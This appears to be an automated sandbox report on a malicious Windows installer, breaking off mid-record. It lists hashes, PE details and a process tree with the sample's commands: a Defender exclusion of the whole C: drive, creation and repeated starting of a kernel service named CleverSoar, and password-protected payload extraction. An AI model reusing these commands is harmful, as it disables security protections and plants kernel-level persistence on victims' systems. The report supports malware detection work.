                          SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                          SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 24%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                          \Device\ConDrv

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946151144235558
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          File size:7'238'486 bytes
                          MD5:d81e3f29d547be83a40d0ace4bd86985
                          SHA1:623922ffc12a8b5c69215d133b23c4eb75cb5979
                          SHA256:a6c25c845a00c651e6f35751ca141e18f4065492d9f3720056b5184a2030301e
                          SHA512:60eb429308f0f39c7bb351936fbe3da0fd424cc5f6ca9bdcbef0b793ab3617f06ac63f9bdc7b2b4d000f17945d9953214c04036703576850c772ad8e7e211e95
                          SSDEEP:98304:XwRERKdk0tGkmWu7m6cmsIm8CWj9TwqwNnVjCMUMzeV+hYOBuDXwtWf2dMwZgS:lAB0NWu7TcmLmMp8NngEyV+mguDXbk/
                          TLSH:D5761223F2CBD13DF45A0B3716B2A15494FBAA216422AE5796ECB4ECCF311501E3E617
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                          File Icon

                          Icon Hash:0c0c2d33ceec80aa

                          Static PE Info

                          General

                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007F5C61251875h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007F5C612E31FBh
                          call 00007F5C612E2D4Eh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007F5C612DDA28h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007F5C6124B923h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007F5C612DED53h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007F5C612E3283h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007F5C612E9F6Ah
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007F5C612DF648h
                          mov edx, dword ptr [004B4200h]

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc0xcb0000x110000x1100039a54fc0c361d3fb2d2b0ae8b885da59False0.1877154181985294data3.7236783426264393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                          RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                          RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                          RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                          RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                          RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                          RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                          RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                          RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                          RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                          RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                          RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                          RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                          RT_STRING0xd8e000x3f8data0.3198818897637795
                          RT_STRING0xd91f80x2dcdata0.36475409836065575
                          RT_STRING0xd94d40x430data0.40578358208955223
                          RT_STRING0xd99040x44cdata0.38636363636363635
                          RT_STRING0xd9d500x2d4data0.39226519337016574
                          RT_STRING0xda0240xb8data0.6467391304347826
                          RT_STRING0xda0dc0x9cdata0.6410256410256411
                          RT_STRING0xda1780x374data0.4230769230769231
                          RT_STRING0xda4ec0x398data0.3358695652173913
                          RT_STRING0xda8840x368data0.3795871559633027
                          RT_STRING0xdabec0x2a4data0.4275147928994083
                          RT_RCDATA0xdae900x10data1.5
                          RT_RCDATA0xdaea00x310data0.6173469387755102
                          RT_RCDATA0xdb1b00x2cdata1.2045454545454546
                          RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                          RT_VERSION0xdb2980x584dataEnglishUnited States0.2797450424929179
                          RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                          Imports

                          DLLImport
                          kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                          comctl32.dllInitCommonControls
                          user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                          oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                          advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                          Exports

                          NameOrdinalAddress
                          __dbk_fcall_wrapper20x40fc10
                          dbkFCallWrapperAddr10x4b063c

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          No network behavior found

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:07:11:30
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
                          Imagebase:0x4d0000
                          File size:7'238'486 bytes
                          MD5 hash:D81E3F29D547BE83A40D0ACE4BD86985
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:07:11:31
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
                          Imagebase:0x5c0000
                          File size:3'366'912 bytes
                          MD5 hash:6A58BEB829BD96D5574E24C76DD36FD9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:3
                          Start time:07:11:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:07:11:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:07:11:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:6
                          Start time:07:11:40
                          Start date:24/12/2024
                          Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
                          Imagebase:0x4d0000
                          File size:7'238'486 bytes
                          MD5 hash:D81E3F29D547BE83A40D0ACE4BD86985
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:false

                          General

                          Target ID:7
                          Start time:07:11:40
                          Start date:24/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
                          Imagebase:0xe20000
                          File size:3'366'912 bytes
                          MD5 hash:6A58BEB829BD96D5574E24C76DD36FD9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:Borland Delphi
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:8
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:9
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:10
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:11
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                          Imagebase:0x3c0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          Has exited:true

                          General

                          Target ID:12
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:13
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Program Files (x86)\Windows NT\7zr.exe
                          Wow64 process (32bit):true
                          Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                          Imagebase:0x3c0000
                          File size:831'200 bytes
                          MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:14
                          Start time:07:11:43
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:15
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:16
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:17
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:18
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:19
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:20
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:21
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:22
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:23
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:24
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:25
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:26
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:27
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:28
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:29
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:30
                          Start time:07:11:44
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
